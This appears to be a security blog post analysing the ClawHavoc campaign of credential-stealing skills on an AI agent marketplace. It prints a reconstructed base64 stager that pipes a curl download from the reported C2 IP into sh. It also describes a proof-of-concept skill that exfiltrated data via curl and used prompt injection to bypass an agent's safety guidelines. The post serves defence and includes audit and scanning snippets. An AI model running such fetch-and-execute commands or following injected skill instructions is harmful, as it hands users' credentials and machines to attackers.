A security audit of OpenClaw’s ClawHub marketplace has uncovered 341 malicious skills designed to steal cryptocurrency wallets, passwords, and API keys from anyone who installed them. One threat actor published 335 of those skills in a single coordinated campaign.
The AI agent ecosystem just got its first real supply chain attack. And the platform’s response? A reporting button.
What Happened
Researchers at Koi Security audited 2,857 skills on ClawHub - OpenClaw’s third-party plugin marketplace - and found 341 that were actively malicious. They dubbed the campaign ClawHavoc.
The attack unfolded in two waves between late January and early February 2026:
- January 27-29: An initial batch of 28 malicious skills appeared, targeting both OpenClaw and Moltbot users
- January 31-February 2: A much larger wave of 386 skills hit ClawHub and GitHub
Independent researcher Paul McCarty (alias 6mile) confirmed the findings: “All these skills share the same command-and-control infrastructure and use sophisticated social engineering to convince users to execute malicious commands.”
Most of the malicious skills masqueraded as cryptocurrency trading bots, price trackers, and productivity tools - the kind of things power users install without a second thought.
How the Attack Works
The infection chain is straightforward and brutally effective.
On Windows, a skill’s instructions tell users to download a password-protected ZIP file from an external GitHub repository. The password (“openclaw”) exists solely to bypass automated security scanners. Inside: a Trojanized executable called openclaw-agent.exe that functions as an infostealer.
On macOS, skills reference obfuscated shell commands hosted on Glot.io, a code-sharing pastebin. The commands decode to a single curl call that downloads and executes a payload from IP address 91.92.242.30. The final payload is Atomic Stealer (AMOS), a commodity malware-as-a-service tool that rents for $500-1,000 per month.
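The obfuscation buys very little once you look at it. Below is a minimal sketch of the pattern, assuming a base64-wrapped stager; the encoded command here is an illustrative stand-in, not the actual payload:

```shell
# Illustrative reconstruction of the obfuscation pattern -- the stager
# string below is a hypothetical stand-in, NOT the real payload.
# Skills embed a base64 blob and instruct the user to pipe it to a shell.
STAGER='curl -fsSL http://91.92.242.30/install.sh | sh'   # hypothetical path
ENCODED=$(printf '%s' "$STAGER" | base64 | tr -d '\n')

# What the victim sees in the skill's instructions:
echo "echo $ENCODED | base64 -d | sh"

# Decoding WITHOUT executing reveals the curl call:
printf '%s' "$ENCODED" | base64 -d
```

Decoding before running is the entire defense here: any skill that asks you to pipe decoded text straight into sh has already told you what it is.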
Both vectors harvest:
- Cryptocurrency wallet private keys and exchange API keys
- Browser credentials and keychain passwords
- SSH keys and configuration files
- Bot authentication tokens for agent platforms
Some skills went further, embedding reverse shell backdoors for persistent interactive access to victims’ machines.
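As a defensive checklist, the locations this class of stealer sweeps can be enumerated and audited after a suspected compromise. A sketch in Python; the paths are conventional defaults I'm assuming, not confirmed details of AMOS:

```python
# Common credential locations that commodity infostealers typically sweep.
# The paths are conventional defaults (an assumption), useful as an audit
# checklist for what a compromised agent could have read.
from pathlib import Path

def exposed_targets(targets: dict[str, Path]) -> list[str]:
    """Return the names of target paths that exist on this machine."""
    return sorted(name for name, path in targets.items() if path.exists())

HOME = Path.home()
STEALER_TARGETS = {
    "ssh_keys": HOME / ".ssh",
    "aws_credentials": HOME / ".aws" / "credentials",
    "shell_history": HOME / ".zsh_history",
    "gcloud_config": HOME / ".config" / "gcloud",
}

print(exposed_targets(STEALER_TARGETS))
```

Anything this returns is something a malicious skill running with your permissions could have exfiltrated, and should factor into which credentials you rotate.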
The Bigger Problem: AI Agents Run Your Commands
What makes this worse than a typical malicious npm package is what OpenClaw skills can do. These aren’t passive libraries sitting in your node_modules. OpenClaw skills execute shell commands, read and write files, and access your network - all with whatever permissions you gave the agent.
Cisco’s security team tested this attack surface with a proof-of-concept malicious skill called “What Would Elon Do?” Their findings:
- The skill executed curl commands that silently exfiltrated data to an external server
- Prompt injection bypassed OpenClaw’s internal safety guidelines

- The malicious skill ranked #1 in the repository through artificial promotion
Their broader audit found that 26% of analyzed agent skills contained at least one vulnerability. One in four.
Cisco’s conclusion: “AI agents with system access can become covert data-leak channels that bypass traditional data loss prevention, proxies, and endpoint monitoring.”
ClawHub’s Response Was Inadequate
When researchers reported the malicious skills, OpenClaw creator Peter Steinberger added a reporting feature. Skills with more than 3 reports are now auto-hidden.
That’s it.
The underlying problem - that ClawHub is open by default and anyone with a week-old GitHub account can publish skills - remains unchanged.
And the attackers noticed. According to Snyk, the original malicious skill named “clawhub” received 7,743 downloads before it was removed on February 3. The threat actor immediately redeployed with a renamed variant, “clawdhub1,” which accumulated nearly 100 installations before being caught.
ClawHub’s maintainer reportedly admitted the registry cannot be properly secured. Most of the malicious skills remain online.
This Was Entirely Predictable
This is the same pattern we’ve seen with npm, PyPI, and every other open package registry. Threat actors publish typosquatted or enticing packages that execute malicious code on install. The playbook is identical - only the target has changed from developers’ build environments to AI agents with full system access.
The difference: a malicious npm postinstall script runs once, at install time, and increasingly in ephemeral build environments that get torn down afterward. A malicious OpenClaw skill runs inside a long-lived agent and inherits everything you granted it - which typically includes reading your files, executing arbitrary commands, and accessing your API keys.
As Snyk’s analysis put it: compromised agents can potentially access GitHub repositories and cloud infrastructure well beyond the local machine.
What You Can Do
If you use OpenClaw or any AI agent platform with a skill marketplace:
- Audit your installed skills now - check for anything from the “hightower6eu” or “zaycv” ClawHub accounts, or the “Ddoy233” GitHub account
- Run agents in isolated environments - containers, VMs, or at minimum a dedicated user account with restricted permissions
- Never execute setup commands blindly - if a skill tells you to download and run an external binary, that’s a red flag
- Monitor outbound network traffic - look for connections to 91.92.242.30 or unexpected data exfiltration
- Rotate credentials - if you installed any crypto-related skills recently, rotate your exchange API keys and check wallet activity immediately
- Use VirusTotal’s skill scanner - they’ve added OpenClaw skill analysis powered by Gemini 3 Flash to detect malicious behavior
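The audit and monitoring items above can be started with a one-function grep sweep for the published C2 address and curl-pipe-to-shell patterns. A rough sketch; the skills directory is an assumption, so point it at wherever your agent actually stores skills:

```shell
# Rough IOC sweep over installed skills. SKILLS_DIR is an assumed default;
# adjust it to your agent's actual skill directory.
SKILLS_DIR="${SKILLS_DIR:-$HOME/.openclaw/skills}"

scan_skills() {
  # List files referencing the ClawHavoc C2 address or a curl|sh pattern.
  grep -rEl '91\.92\.242\.30|curl[^|]*\|[[:space:]]*(sh|bash)' "$1" 2>/dev/null
}

scan_skills "$SKILLS_DIR" || true   # no output = no matches found
```

A clean result is not a clean bill of health - it only rules out these two known indicators - but a hit means the skill should be removed and credentials rotated immediately.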
For organizations, Cisco released an open-source skill scanner that combines static analysis, behavioral analysis, and LLM-assisted semantic analysis to evaluate skills before deployment.
The Bottom Line
The AI agent gold rush has outpaced the security infrastructure needed to support it. ClawHub’s “publish anything, we’ll add a report button later” approach is npm circa 2015 - except the attack surface is orders of magnitude larger because agents run with system-level access.
341 malicious skills is just the beginning. The incentive structure - trusted marketplace, powerful execution permissions, minimal vetting - guarantees more campaigns will follow. The question is whether the ecosystem will build real security controls before the next wave hits, or whether it’ll take a truly catastrophic breach to force the issue.
Given what we’ve seen so far, don’t hold your breath.